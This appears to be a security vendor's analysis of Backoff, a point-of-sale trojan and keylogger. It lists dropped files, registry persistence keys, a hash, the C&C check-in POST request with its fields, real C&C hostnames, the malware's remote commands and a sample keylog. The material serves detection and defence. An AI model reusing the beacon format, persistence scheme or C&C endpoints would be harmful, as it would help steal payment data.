Threat Name
Backoff Malware
Threat Type
Trojan, Keylogger, Stealer
Although, this threat has been in the wild for some time, it has been recently reported that it is now being referred to as “Backoff”, and is being used to the infect Point-of-Sale (POS) machines of big retail stores in the United States. The intended purpose is to steal payment information, particularly credit card data.
The attackers tries to plant or deploy this threat into the POS machines, which mostly are running on Windows, by hacking or exploiting them to be able to get access. When the threat is running in an infected system, it tries to steal personal data (e.g. credit card info) from the system using different methods such as memory-scraping and keylogging, and then sends the stolen data to the Command and Control server (C&C) that the malware connects to.
TECHNICAL DETAILS
Startup Technique and payload analysis
The malware usually drops a copy of itself in the %APPDATA% folder and creates registry entries in
HKEY_USERS<some Class ID>SoftwareMicrosoftWindowsCurrentVersionRun
and
HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun
so that it runs whenever the infected machine is restarted.
There are now different variations of this threat of which the functionalities are the same but with little differences in terms of installation and the C&C server it connects to. The name and version of each can be spotted in the HTTP POST data that it sends to the C&C server.
Name: Backoff
Version: 1.55
Md5 – f5b4786c28ccf43e569cb21a6122a97e
When executed, it drops the following files:
“%appdata%mskrnl – (this looks like a RC4 encrypted copy of itself)
“%appdata%AdobeFlashPlayermswinhost.exe” – (a copy of itself)
“%appdata%AdobeFlashPlayerlog.txt” – a text file where it save the data logged by its keylogging function
It also creates the following registry entries:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion
identifier = “<random characters>”
HKEY_USERSS-1-5-21-1060284298-261478967-725345543-500SoftwareMicrosoftWindowsCurrentVersion
identifier = “<random characters>”
The above registry value is a randomly generated 7 character string so it is different with every infection.
HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun
Windows NT Service = “%AppData% AdobeFlashPlayermswinhost.exe”
HKEY_USERSS-1-5-21-1060284298-261478967-725345543-500SoftwareMicrosoftWindowsCurrentVersionRun
Windows NT Service = “%AppData% AdobeFlashPlayermswinhost.exe”
The above registry key is to make the threat run on start up.
Communication with C&C
Then it tries to connect to its Command and Control (C&C) server and sends the following POST data:
POST /aero2/fly.php HTTP/1.0
Host: <c&c server hostname>
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept-Language: en-us
Accept-Encoding: text/plain
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
&op=1&id=<random characters>WgBClNZ&ui=<user_name> @ <hostname>&wv=11&gr=backoff&bv=1.55
Where:
op = This seems to always have a value of 1
id = randomly generated characters, this is the string saved in the above-mentioned registry entry
ui = currently logged-in user name and the hostname of the infected machine
wv = Windows version of infected machine
gr = could be the group name of malware e.g “backoff”
bv = version of malware “1.55”
C&C server hosts:
pop3smtp5imap2.com/aero2/fly.php
pop3smtp5imap3.com/aero2/fly.php
pop3smtp5imap4.ru/aero2/fly.php
After a successful connection to the C&C server, it will receive a reply which is usually a command or instruction coming from the server. The usual command receive is the string “Thanks!” which is probably just an acknowledgement that is has successfully connected to the server.
A “Thanks!“ reply looks like this:
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Fri, 01 Aug 2014 22:09:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.28-1~dotdeb.0
Thanks!
Other commands
Other commands that the malware will get from the server are as follows:
* Update – most likely to instruct the malware to try and get an updated version
* Terminate – most likely to terminate all running instances in the infected machine
* Uninstall – most likely to uninstall or remove everything from the infected machine
* Download and Run – this command most likely will contain other data in the response which includes a link or location to download and execute a certain file.
* Upload Keylogs – most likely the command to upload the text file containing the keyloggers logged data (log.txt)
Keylogging Function:
As mentioned, the threat has a keylogging functions which logs the name of the current active window and any keystrokes performed in that window. As an example, the contents of log.txt may look like this
[Arrow Right][Backspace][Backspace][Backspace]
[Run] – [02/08/2014 17:40:40]
%appdata%[Arrow Down]
[Program Manager] – [02/08/2014 17:40:41]
[Enter]
[about:blank – Microsoft Internet Explorer] – [03/08/2014 16:03:46]
www.bankofamerica.com[Enter]mybogusloginID[Enter]
There are multiple variations of the malware which drop differently named files and use different registry entries.